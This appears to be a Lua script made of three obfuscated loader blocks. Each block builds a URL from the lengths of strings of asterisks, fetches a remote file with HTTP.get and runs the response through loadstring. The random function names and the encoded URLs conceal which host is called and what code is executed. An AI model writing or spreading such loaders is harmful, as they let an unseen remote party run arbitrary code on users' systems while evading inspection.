function sfJSiKwzzxIYmWopUZsKuKGirATuydioQRWDNzifWVLoObRIPEAiBRNIqXLJEfFHzHtEhppkUGZGIxyiZ(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(sfJSiKwzzxIYmWopUZsKuKGirATuydioQRWDNzifWVLoObRIPEAiBRNIqXLJEfFHzHtEhppkUGZGIxyiZ({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','*****************************************************************************************************','************************************************************************************************************','*******************************************************************************************************************','****************************************************','*****************************************************','******************************************************','***********************************************','****************************************************************************************','************************************************************************************************************************','****************************************************************************','*********************************************************************************************************************','*******************************************************************','*************************************************************************************************','***********************************************************************************','************************************************************************************************************************','****************************************************************************************','***********************************************************************************************','**************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','********************************************************************************************************','****************************************************************************************************************','*************************************','**************************************************','************************************************','*************************************************************************************************************************','*************************************','**************************************************','************************************************','******************************************************************','*********************************************************************************************************************','******************************************************************************************************','******************************************************************************************************'}), function(script)
    assert(loadstring(script))()
end)    

function QWwxyIXzmoVEfNpcXSYXFneEPUQgdxJRWrauYwakWSMLmjhfdfECfRml(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(QWwxyIXzmoVEfNpcXSYXFneEPUQgdxJRWrauYwakWSMLmjhfdfECfRml({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','*****************************************************************************************************','************************************************************************************************************','*******************************************************************************************************************','****************************************************','*****************************************************','******************************************************','***********************************************','****************************************************************************************','************************************************************************************************************************','****************************************************************************','*********************************************************************************************************************','*******************************************************************','*************************************************************************************************','***********************************************************************************','************************************************************************************************************************','****************************************************************************************','***********************************************************************************************','**************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*****************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************************************************************','*****************************************************************************','*************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','***************************************************************************************************************','*******************************************************************************************************************'}), function(script)
    assert(loadstring(script))()
end)    

function gCoRXMBoVdbMlzcKHnpovZPhltkgOZhicCHVwxioDkIEKuoUsojEtCGmvJRiJrccCgKHSiNsUrsm(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


HTTP.get(gCoRXMBoVdbMlzcKHnpovZPhltkgOZhicCHVwxioDkIEKuoUsojEtCGmvJRiJrccCgKHSiNsUrsm({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','***********************************************************************************','*****************************************************************************************************','************************************************************************************************************','*******************************************************************************************************************','****************************************************','*****************************************************','******************************************************','***********************************************','****************************************************************************************','************************************************************************************************************************','****************************************************************************','*********************************************************************************************************************','*******************************************************************','*************************************************************************************************','***********************************************************************************','************************************************************************************************************************','****************************************************************************************','***********************************************************************************************','**************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','********************************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','************************************************************************************************************','*******************************************************************************************************************'}), function(script)
    assert(loadstring(script))()
end)    
